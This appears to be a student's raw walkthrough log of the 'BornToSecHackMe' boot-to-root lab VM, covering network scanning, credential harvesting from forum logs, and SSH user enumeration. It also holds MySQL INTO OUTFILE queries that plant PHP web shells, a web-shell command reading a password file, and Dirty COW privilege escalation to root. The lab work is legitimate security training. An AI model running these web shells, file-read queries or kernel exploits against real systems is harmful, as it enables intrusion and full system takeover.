nmap -sn 192.168.1.0/24 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-07 10:18 EST
Nmap scan report for Air-de-Ymane.lan (192.168.1.1)
Host is up (0.0045s latency).
Nmap scan report for BornToSecHackMe.lan (192.168.1.4)
Host is up (0.0029s latency).
Nmap scan report for kali.lan (192.168.1.37)
Host is up (0.00087s latency).
Nmap scan report for bbox.lan (192.168.1.254)
Host is up (0.0049s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.41 seconds

----------

└─$ nmap -sV -sC  192.168.1.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-07 10:20 EST
Nmap scan report for BornToSecHackMe.lan (192.168.1.4)
Host is up (0.0029s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp      vsftpd 2.0.8 or later
|_ftp-anon: got code 500 "OOPS: vsftpd: refusing to run with writable root inside chroot()".
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 07:bf:02:20:f0:8a:c8:48:1e:fc:41:ae:a4:46:fa:25 (DSA)
|   2048 26:dd:80:a3:df:c4:4b:53:1e:53:42:46:ef:6e:30:b2 (RSA)
|_  256 cf:c3:8c:31:d7:47:7c:84:e2:d2:16:31:b2:8e:63:a7 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Hack me if you can
|_http-server-header: Apache/2.2.22 (Ubuntu)
143/tcp open  imap     Dovecot imapd
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2015-10-08T20:57:30
|_Not valid after:  2025-10-07T20:57:30
|_imap-capabilities: more LOGINDISABLEDA0001 listed STARTTLS IDLE OK have capabilities Pre-login post-login SASL-IR LOGIN-REFERRALS ID LITERAL+ IMAP4rev1 ENABLE
|_ssl-date: 2024-02-07T15:22:21+00:00; +1m48s from scanner time.
443/tcp open  ssl/http Apache httpd 2.2.22
|_ssl-date: 2024-02-07T15:22:20+00:00; +1m47s from scanner time.
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=BornToSec
| Not valid before: 2015-10-08T00:19:46
|_Not valid after:  2025-10-05T00:19:46
993/tcp open  ssl/imap Dovecot imapd
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2015-10-08T20:57:30
|_Not valid after:  2025-10-07T20:57:30
|_ssl-date: 2024-02-07T15:22:20+00:00; +1m47s from scanner time.
|_imap-capabilities: more Pre-login SASL-IR IDLE AUTH=PLAINA0001 have listed capabilities post-login OK LOGIN-REFERRALS ID LITERAL+ IMAP4rev1 ENABLE
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1m47s, deviation: 0s, median: 1m46s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.35 seconds

---------------

dirb http://192.168.1.50

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Feb  7 10:43:57 2024
URL_BASE: http://192.168.1.50/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.50/ ----
+ http://192.168.1.50/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://192.168.1.50/fonts/
+ http://192.168.1.50/forum (CODE:403|SIZE:285)
+ http://192.168.1.50/index.html (CODE:200|SIZE:1025)
+ http://192.168.1.50/server-status (CODE:403|SIZE:293)

---- Entering directory: http://192.168.1.50/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Wed Feb  7 10:44:18 2024
DOWNLOADED: 4612 - FOUND: 4

## Looking in fonts/ but nothing interesting

--------

dirb https://192.168.1.50:443     

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Feb  7 10:49:17 2024
URL_BASE: https://192.168.1.50:443/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: https://192.168.1.50:443/ ----
+ https://192.168.1.50:443/cgi-bin/ (CODE:403|SIZE:289)                         
==> DIRECTORY: https://192.168.1.50:443/forum/                                  
==> DIRECTORY: https://192.168.1.50:443/phpmyadmin/                             
+ https://192.168.1.50:443/server-status (CODE:403|SIZE:294)                    
==> DIRECTORY: https://192.168.1.50:443/webmail/ 
[...]

## Looking in each directories

----------------

---- FORUM

## Probleme login?

> Logs of ssh connexions. 2 sessions opened Root and Lmezard

```
Oct 5 08:45:01 BornToSecHackMe CRON[7494]: pam_unix(cron:session): session opened for user root by (uid=0)

Oct 5 08:46:01 BornToSecHackMe CRON[7549]: pam_unix(cron:session): session opened for user lmezard by (uid=1040)

#Interesting string 
Oct 5 08:45:29 BornToSecHackMe sshd[7547]: Failed password for invalid user !q\]Ej?*5K5cy*AJ from 161.202.39.38 port 57764 ssh2

Oct 5 13:31:19 BornToSecHackMe sshd[20199]: reverse mapping checking getaddrinfo for ppp-253-14.20-151.wind.it [151.20.14.253] failed - POSSIBLE BREAK-IN ATTEMPT!
Oct 5 13:31:19 BornToSecHackMe sshd[20199]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=151.20.14.253 user=root

Oct 5 14:40:02 BornToSecHackMe CRON[23196]: pam_unix(cron:session): session closed for user root
Oct 5 14:40:37 BornToSecHackMe sshd[23239]: Received disconnect from 222.122.118.49: 11: Bye Bye [preauth]

Oct 5 14:46:43 BornToSecHackMe sshd[23499]: Received disconnect from 113.199.73.28: 11: Bye Bye [preauth]

Oct 5 14:54:00 BornToSecHackMe sshd[23804]: Accepted password for admin from 62.210.32.157 port 61495 ssh2
Oct 5 14:54:00 BornToSecHackMe sshd[23804]: pam_unix(sshd:session): session opened for user admin by (uid=0)

Oct 5 14:54:29 BornToSecHackMe sudo: admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/bin/sh

Oct 5 15:03:55 BornToSecHackMe sudo: root : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/sbin/service vsftpd restart


```
## Other subjects nothing interseting but login names:
- qudevide
- zaz
- wandre
- thor
- admin
- laurie

## A list of keyword:
- mouette
- gasolina
- !q\]Ej?*5K5cy*AJ

## List users
https://192.168.1.50/forum/index.php?mode=user

## Trying to bruteforce
Lmezard ok with password !q\]Ej?*5K5cy*AJ
Found laurie@borntosec.net

## Enum Users with the list of login name found on the forum

msf6 > use 54
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 192.168.56.5
RHOSTS => 192.168.56.5
msf6 auxiliary(scanner/ssh/ssh_enumusers) > exploit

[-] Auxiliary aborted due to failure: bad-config: Please populate DB_ALL_USERS, USER_FILE, USERNAME
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE names.lst
USER_FILE => names.lst
msf6 auxiliary(scanner/ssh/ssh_enumusers) > exploit
[*] 192.168.56.5:22 - SSH - Using malformed packet technique
[*] 192.168.56.5:22 - SSH - Checking for false positives
[*] 192.168.56.5:22 - SSH - Starting scan
[+] 192.168.56.5:22 - SSH - User 'zaz' found
[+] 192.168.56.5:22 - SSH - User 'thor' found
[+] 192.168.56.5:22 - SSH - User 'laurie' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

---- WEBMAIL

## Trying bruteforce with the usernames and wordlists 
ok : laurie@borntosec.net
!q\]Ej?*5K5cy*AJ

Found 2 received mail
2 sent mail

## Another email
- qudevide@mail.borntosec.net
- ft_root@mail.borntosec.net

## Password DB root

Hey Laurie,

You cant connect to the databases now. Use root/Fg-'kKXBj87E:aJ$

Best regards.


---- PHPMYADMIN

## Trying bruteforce with usernames and wordlists

## Connexion :
root
Fg-'kKXBj87E:aJ$
Fg-'kKXBj87E:a$J
Fg-'kKXBj87E:Ja$
Fg-'kKXBj87E:J$a

## User email list FORUM
- admin@borntosec.net
- laurie@
- qudevide@
- thor@
- wandre@
- zaz@

# User mysql database
- root
- debian-sys-maint
- phpmyadmin

CREATE TABLE test(
   ID int,
   TEXT varchar(255)
);

## Test sending queries with sql 

retrieve a file = 

load data infile "/etc/passwd" into table mysql.test FIELDS TERMINATED BY '\n';

create a file =

select "<? System($_REQUEST[‘cmd’]); ?>" into outfile '/var/www/cmd.php';

POC =
SELECT '<?php phpinfo() ?>' INTO OUTFILE '/var/www/forum/templates_c/info.php' ;

## ON THE FORUM PAGE

cmd injection = SELECT "<? echo passthru($_GET['cmd']); ?>" INTO OUTFILE '/var/www/forum/templates_c/cmd0.php' ;

https://sqlwiki.netspi.com/attackQueries/executingOSCommands/#mysql

https://192.168.56.5/forum/templates_c/cmd0.php?cmd=cat%20 ../../../../home/LOOKATME/password

lmezard:
G!@M6f4Eatau{sF"

## FTP CONNEXION

ftp 192.168.56.5
Connected to 192.168.56.5.
220 Welcome on this server
Name (192.168.56.5:kali): lmezard
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

ftp> ls
229 Entering Extended Passive Mode (|||18787|).
150 Here comes the directory listing.
-rwxr-x---    1 1001     1001           96 Oct 15  2015 README
-rwxr-x---    1 1001     1001       808960 Oct 08  2015 fun

## EXPLOITING THE FILES
└─$ cat README    
Complete this little challenge and use the result as password for user 'laurie' to login in ssh

└─$ file fun
fun: POSIX tar archive (GNU)
└─$ tar xvf fun

PCAP file but not realy, ascii
cat * look like there is a program. Some function are in order but others not. Trying bruteforce way with the letters i don't have the order but time consuming.
Look like //fileXX gives us a hint about the order: sorted the return 'x'; with the getmeX() function :
cat *.pcap | grep -A 9 -E 'getme|return'

`
#include <string.h>
#include <stdio.h>

char getme6() {
        return 't';
}
char getme7() {
        return 'p';
}
char getme3() {
        return 'e';
}
char getme4() {
        return 'a';
}

char getme1() {
        return 'I';
}
char getme2() {
        return 'h';
}
char getme5() {
        return 'r';
}
char getme8() {
        return 'w';
}
char getme9() {
        return 'n';
}
char getme10() {
        return 'a';
}
char getme11() {
        return 'g';
}
char getme12(){
        return 'e';
}
int main() {
        printf("M");
        printf("Y");
        printf(" ");
        printf("P");
        printf("A");
        printf("S");
        printf("S");
        printf("W");
        printf("O");
        printf("R");
        printf("D");
        printf(" ");
        printf("I");
        printf("S");
        printf(":");
        printf(" ");
        printf("%c",getme1());
        printf("%c",getme2());
        printf("%c",getme3());
        printf("%c",getme4());
        printf("%c",getme5());
        printf("%c",getme6());
        printf("%c",getme7());
        printf("%c",getme8());
        printf("%c",getme9());
        printf("%c",getme10());
        printf("%c",getme11());
        printf("%c",getme12());
        printf("\n");
        printf("Now SHA-256 it and submit");
}
`

└─$ ./a.out 
MY PASSWORD IS: Iheartpwnage
Now SHA-256 it and submit

result of sha-256 :
330b845f32185747e4f8ca15d40ca59796035c89ea809fb5d30f4da83ecf45a4

### On the machine Laurie
uname -a
Linux BornToSecHackMe 3.2.0-91-generic-pae #129-Ubuntu SMP Wed Sep 9 11:27:47 UTC 2015 i686 i686 i386 GNU/Linux

Dirty COW (CVE-2016-5195) : Kernel version 3.2.0 vuln 

laurie@BornToSecHackMe:/tmp$ ./dirty password
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: password
Complete line:
b2r:b2YUoYX2JpSKY:0:0:pwned:/root:/bin/bash

mmap: b7fda000


^C
laurie@BornToSecHackMe:/tmp$ su b2r
Password:
b2r@BornToSecHackMe:/tmp# id
uid=0(b2r) gid=0(root) groups=0(root)

-----------------

For an RCE :
https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
